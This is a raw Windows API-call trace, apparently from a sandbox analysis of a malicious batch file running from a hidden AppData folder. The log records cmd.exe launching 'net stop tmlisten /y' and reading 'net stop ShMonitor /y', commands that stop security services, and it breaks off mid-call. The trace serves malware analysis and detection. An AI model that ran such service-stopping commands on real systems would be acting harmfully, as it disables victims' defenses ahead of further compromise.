[0204.841] GetProcessHeap () returned 0x3e0000 [0204.841] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0204.841] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.842] GetProcessHeap () returned 0x3e0000 [0204.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0204.842] GetProcessHeap () returned 0x3e0000 [0204.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0204.842] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0204.842] GetProcessHeap () returned 0x3e0000 [0204.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0204.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.842] GetProcessHeap () returned 0x3e0000 [0204.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0204.842] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0204.842] GetProcessHeap () returned 0x3e0000 [0204.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0204.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.843] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.843] GetLastError () returned 0x2 [0204.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.844] GetLastError () returned 0x2 [0204.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.844] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.845] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0204.845] GetLastError () returned 0x2 [0204.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0204.846] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0204.846] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.847] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0204.847] SetErrorMode (uMode=0x0) returned 0x1 [0204.847] GetProcessHeap () returned 0x3e0000 [0204.847] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0204.847] GetProcessHeap () returned 0x3e0000 [0204.847] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0204.847] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0204.847] GetProcessHeap () returned 0x3e0000 [0204.847] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0204.847] GetProcessHeap () returned 0x3e0000 [0204.847] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0204.847] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0204.848] GetProcessHeap () returned 0x3e0000 [0204.848] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0204.848] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.848] GetProcessHeap () returned 0x3e0000 [0204.848] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0204.848] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0204.848] GetProcessHeap () returned 0x3e0000 [0204.848] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0204.848] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.849] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.849] GetLastError () returned 0x2 [0204.849] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.849] GetLastError () returned 0x2 [0204.850] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0204.850] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0204.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0204.851] GetLastError () returned 0x2 [0204.851] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0204.851] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0204.851] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.852] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0204.852] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0204.852] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0204.852] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0204.852] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop tmlisten /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop tmlisten /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop tmlisten /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xacc, dwThreadId=0x648)) returned 1 [0204.856] CloseHandle (hObject=0x74) returned 1 [0204.856] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0204.856] GetProcessHeap () returned 0x3e0000 [0204.856] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.856] GetEnvironmentStringsW () returned 0x3f8408* [0204.856] GetProcessHeap () returned 0x3e0000 [0204.856] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.856] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.856] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0204.995] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0204.995] CloseHandle (hObject=0x78) returned 1 [0204.995] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0204.995] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.996] GetProcessHeap () returned 0x3e0000 [0204.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.996] GetEnvironmentStringsW () returned 0x3f8408* [0204.996] GetProcessHeap () returned 0x3e0000 [0204.996] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.996] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.996] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.996] GetProcessHeap () returned 0x3e0000 [0204.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0204.996] GetEnvironmentStringsW () returned 0x3f8408* [0204.996] GetProcessHeap () returned 0x3e0000 [0204.996] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0204.996] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0204.996] GetProcessHeap () returned 0x3e0000 [0204.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0204.996] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0204.996] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.996] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0204.997] _get_osfhandle (_FileHandle=1) returned 0x264 [0204.997] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0204.997] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.997] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0204.997] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0204.997] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0204.997] SetConsoleInputExeNameW () returned 0x1 [0204.997] GetConsoleOutputCP () returned 0x1b5 [0204.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0204.997] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0204.998] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0204.998] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.998] SetFilePointer (in: hFile=0x78, lDistanceToMove=3870, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf1e [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.998] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0204.998] GetProcessHeap () returned 0x3e0000 [0204.999] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0204.999] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.999] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf1e [0204.999] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x9a3, lpOverlapped=0x0) returned 1 [0204.999] SetFilePointer (in: hFile=0x78, lDistanceToMove=3893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf35 [0204.999] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ShMonitor /y\r\nor /y\r\ny\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 23 [0204.999] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.999] GetFileType (hFile=0x78) returned 0x1 [0204.999] _get_osfhandle (_FileHandle=3) returned 0x78 [0204.999] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf35 [0204.999] GetProcessHeap () returned 0x3e0000 [0204.999] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0204.999] GetProcessHeap () returned 0x3e0000 [0204.999] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.003] _tell (_FileHandle=3) returned 3893 [0205.003] _close (_FileHandle=3) returned 0 [0205.003] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.003] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.003] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.003] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.003] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.003] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.003] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.003] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.003] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.003] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.003] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.003] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.003] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.003] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.003] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.003] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.003] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.003] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.003] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.003] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.003] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.003] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.003] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.003] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.003] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.003] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.004] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.004] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.004] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.004] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.004] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.004] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.004] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.004] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.004] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.004] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.004] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.004] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.004] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.004] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.004] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.004] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.004] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.004] SetErrorMode (uMode=0x0) returned 0x1 [0205.004] GetProcessHeap () returned 0x3e0000 [0205.004] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.004] GetProcessHeap () returned 0x3e0000 [0205.004] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.005] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.005] GetProcessHeap () returned 0x3e0000 [0205.005] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.005] GetProcessHeap () returned 0x3e0000 [0205.005] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.005] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.005] GetProcessHeap () returned 0x3e0000 [0205.005] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.005] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.005] GetProcessHeap () returned 0x3e0000 [0205.005] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.006] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.006] GetProcessHeap () returned 0x3e0000 [0205.006] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.006] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.006] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.007] GetLastError () returned 0x2 [0205.007] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.007] GetLastError () returned 0x2 [0205.007] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.008] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.008] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.008] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.008] GetLastError () returned 0x2 [0205.009] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.009] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.009] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.010] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.010] SetErrorMode (uMode=0x0) returned 0x1 [0205.010] GetProcessHeap () returned 0x3e0000 [0205.010] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.010] GetProcessHeap () returned 0x3e0000 [0205.010] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.010] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.010] GetProcessHeap () returned 0x3e0000 [0205.010] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.010] GetProcessHeap () returned 0x3e0000 [0205.010] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.011] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.011] GetProcessHeap () returned 0x3e0000 [0205.011] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.011] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.011] GetProcessHeap () returned 0x3e0000 [0205.011] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.011] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.011] GetProcessHeap () returned 0x3e0000 [0205.011] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.012] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.012] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.012] GetLastError () returned 0x2 [0205.012] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.013] GetLastError () returned 0x2 [0205.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.013] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0205.013] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0205.014] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.014] GetLastError () returned 0x2 [0205.014] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0205.014] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0205.015] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: 